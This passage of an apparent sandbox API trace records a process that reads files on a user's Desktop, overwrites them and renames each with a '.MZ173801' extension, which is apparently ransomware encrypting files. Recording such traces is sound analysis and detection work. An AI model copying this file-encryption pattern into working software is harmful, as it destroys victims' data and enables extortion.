xMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0124.247] GetCurrentThreadId () returned 0x1358 [0124.247] GetCurrentThreadId () returned 0x1358 [0124.247] GetCurrentThreadId () returned 0x1358 [0124.247] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0124.247] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0124.247] GetCurrentThreadId () returned 0x1358 [0124.248] GetCurrentThreadId () returned 0x1358 [0124.248] GetCurrentThreadId () returned 0x1358 [0124.248] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\XDnTXxKBW\\HPSq.wav" (normalized: "c:\\users\\fd1hvy\\desktop\\xdntxxkbw\\hpsq.wav"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x414 [0124.248] SetFilePointer (in: hFile=0x414, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f6d8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f6d8*=0) returned 0x0 [0124.248] SetFilePointer (in: hFile=0x414, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f6d0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f6d0*=0) returned 0x0 [0124.248] SetFilePointer (in: hFile=0x414, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f6d0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f6d0*=0) returned 0xbd5 [0124.248] SetFilePointer (in: hFile=0x414, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f6d0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f6d0*=0) returned 0x0 [0124.248] ReadFile (in: hFile=0x414, lpBuffer=0x2431b30, nNumberOfBytesToRead=0xbd5, lpNumberOfBytesRead=0x19f6e4, lpOverlapped=0x0 | out: lpBuffer=0x2431b30*, lpNumberOfBytesRead=0x19f6e4*=0xbd5, lpOverlapped=0x0) returned 1 [0124.249] CloseHandle (hObject=0x414) returned 1 [0124.249] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\XDnTXxKBW\\HPSq.wav" (normalized: "c:\\users\\fd1hvy\\desktop\\xdntxxkbw\\hpsq.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x414 [0124.250] WriteFile (in: hFile=0x414, lpBuffer=0x2433b60*, nNumberOfBytesToWrite=0xbd5, lpNumberOfBytesWritten=0x19f6f0, lpOverlapped=0x0 | out: lpBuffer=0x2433b60*, lpNumberOfBytesWritten=0x19f6f0*=0xbd5, lpOverlapped=0x0) returned 1 [0124.251] CloseHandle (hObject=0x414) returned 1 [0124.251] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Desktop\\XDnTXxKBW\\HPSq.wav" (normalized: "c:\\users\\fd1hvy\\desktop\\xdntxxkbw\\hpsq.wav"), lpNewFileName="C:\\Users\\FD1HVy\\Desktop\\XDnTXxKBW\\HPSq.wav.MZ173801" (normalized: "c:\\users\\fd1hvy\\desktop\\xdntxxkbw\\hpsq.wav.mz173801")) returned 1 [0124.251] GetCurrentThreadId () returned 0x1358 [0124.251] GetCurrentThreadId () returned 0x1358 [0124.251] GetCurrentThreadId () returned 0x1358 [0124.251] GetCurrentThreadId () returned 0x1358 [0124.251] GetCurrentThreadId () returned 0x1358 [0124.251] GetCurrentThreadId () returned 0x1358 [0124.252] FindNextFileW (in: hFindFile=0xa1bc40, lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf7d3ec10, ftCreationTime.dwHighDateTime=0x1d5e45d, ftLastAccessTime.dwLowDateTime=0x3195c960, ftLastAccessTime.dwHighDateTime=0x1d5e4f8, ftLastWriteTime.dwLowDateTime=0x3195c960, ftLastWriteTime.dwHighDateTime=0x1d5e4f8, nFileSizeHigh=0x0, nFileSizeLow=0xc414, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName="I2nm.png", cAlternateFileName="")) returned 1 [0124.252] FileTimeToLocalFileTime (in: lpFileTime=0x19f830, lpLocalFileTime=0x19f790 | out: lpLocalFileTime=0x19f790) returned 1 [0124.252] FileTimeToDosDateTime (in: lpFileTime=0x19f790, lpFatDate=0x19f7fe, lpFatTime=0x19f7fc | out: lpFatDate=0x19f7fe, lpFatTime=0x19f7fc) returned 1 [0124.252] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\XDnTXxKBW\\I2nm.png" (normalized: "c:\\users\\fd1hvy\\desktop\\xdntxxkbw\\i2nm.png"), fInfoLevelId=0x0, lpFileInformation=0x19f724 | out: lpFileInformation=0x19f724*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf7d3ec10, ftCreationTime.dwHighDateTime=0x1d5e45d, ftLastAccessTime.dwLowDateTime=0x3195c960, ftLastAccessTime.dwHighDateTime=0x1d5e4f8, ftLastWriteTime.dwLowDateTime=0x3195c960, ftLastWriteTime.dwHighDateTime=0x1d5e4f8, nFileSizeHigh=0x0, nFileSizeLow=0xc414)) returned 1 [0124.252] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0124.252] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0124.252] GetCurrentThreadId () returned 0x1358 [0124.252] GetCurrentThreadId () returned 0x1358 [0124.252] GetCurrentThreadId () returned 0x1358 [0124.253] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0124.253] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0124.253] GetCurrentThreadId () returned 0x1358 [0124.253] GetCurrentThreadId () returned 0x1358 [0124.253] GetCurrentThreadId () returned 0x1358 [0124.253] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\XDnTXxKBW\\I2nm.png" (normalized: "c:\\users\\fd1hvy\\desktop\\xdntxxkbw\\i2nm.png"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x414 [0124.253] SetFilePointer (in: hFile=0x414, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f6d8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f6d8*=0) returned 0x0 [0124.253] SetFilePointer (in: hFile=0x414, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f6d0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f6d0*=0) returned 0x0 [0124.253] SetFilePointer (in: hFile=0x414, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f6d0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f6d0*=0) returned 0xc414 [0124.254] SetFilePointer (in: hFile=0x414, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f6d0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f6d0*=0) returned 0x0 [0124.254] ReadFile (in: hFile=0x414, lpBuffer=0x2431b30, nNumberOfBytesToRead=0xc414, lpNumberOfBytesRead=0x19f6e4, lpOverlapped=0x0 | out: lpBuffer=0x2431b30*, lpNumberOfBytesRead=0x19f6e4*=0xc414, lpOverlapped=0x0) returned 1 [0124.255] CloseHandle (hObject=0x414) returned 1 [0124.256] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\XDnTXxKBW\\I2nm.png" (normalized: "c:\\users\\fd1hvy\\desktop\\xdntxxkbw\\i2nm.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x414 [0124.257] WriteFile (in: hFile=0x414, lpBuffer=0x23a47a0*, nNumberOfBytesToWrite=0xc414, lpNumberOfBytesWritten=0x19f6f0, lpOverlapped=0x0 | out: lpBuffer=0x23a47a0*, lpNumberOfBytesWritten=0x19f6f0*=0xc414, lpOverlapped=0x0) returned 1 [0124.433] CloseHandle (hObject=0x414) returned 1 [0124.433] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Desktop\\XDnTXxKBW\\I2nm.png" (normalized: "c:\\users\\fd1hvy\\desktop\\xdntxxkbw\\i2nm.png"), lpNewFileName="C:\\Users\\FD1HVy\\Desktop\\XDnTXxKBW\\I2nm.png.MZ173801" (normalized: "c:\\users\\fd1hvy\\desktop\\xdntxxkbw\\i2nm.png.mz173801")) returned 1 [0124.434] GetCurrentThreadId () returned 0x1358 [0124.434] GetCurrentThreadId () returned 0x1358 [0124.434] GetCurrentThreadId () returned 0x1358 [0124.434] GetCurrentThreadId () returned 0x1358 [0124.434] GetCurrentThreadId () returned 0x1358 [0124.434] GetCurrentThreadId () returned 0x1358 [0124.434] FindNextFileW (in: hFindFile=0xa1bc40, lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfd570c30, ftCreationTime.dwHighDateTime=0x1d5e2eb, ftLastAccessTime.dwLowDateTime=0xa8c8da60, ftLastAccessTime.dwHighDateTime=0x1d5e0dc, ftLastWriteTime.dwLowDateTime=0xa8c8da60, ftLastWriteTime.dwHighDateTime=0x1d5e0dc, nFileSizeHigh=0x0, nFileSizeLow=0x185b8, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName="jxZ9.mp3", cAlternateFileName="")) returned 1 [0124.434] FileTimeToLocalFileTime (in: lpFileTime=0x19f830, lpLocalFileTime=0x19f790 | out: lpLocalFileTime=0x19f790) returned 1 [0124.434] FileTimeToDosDateTime (in: lpFileTime=0x19f790, lpFatDate=0x19f7fe, lpFatTime=0x19f7fc | out: lpFatDate=0x19f7fe, lpFatTime=0x19f7fc) returned 1 [0124.434] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\XDnTXxKBW\\jxZ9.mp3" (normalized: "c:\\users\\fd1hvy\\desktop\\xdntxxkbw\\jxz9.mp3"), fInfoLevelId=0x0, lpFileInformation=0x19f724 | out: lpFileInformation=0x19f724*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfd570c30, ftCreationTime.dwHighDateTime=0x1d5e2eb, ftLastAccessTime.dwLowDateTime=0xa8c8da60, ftLastAccessTime.dwHighDateTime=0x1d5e0dc, ftLastWriteTime.dwLowDateTime=0xa8c8da60, ftLastWriteTime.dwHighDateTime=0x1d5e0dc, nFileSizeHigh=0x0, nFileSizeLow=0x185b8)) returned 1 [0124.434] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0124.434] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, 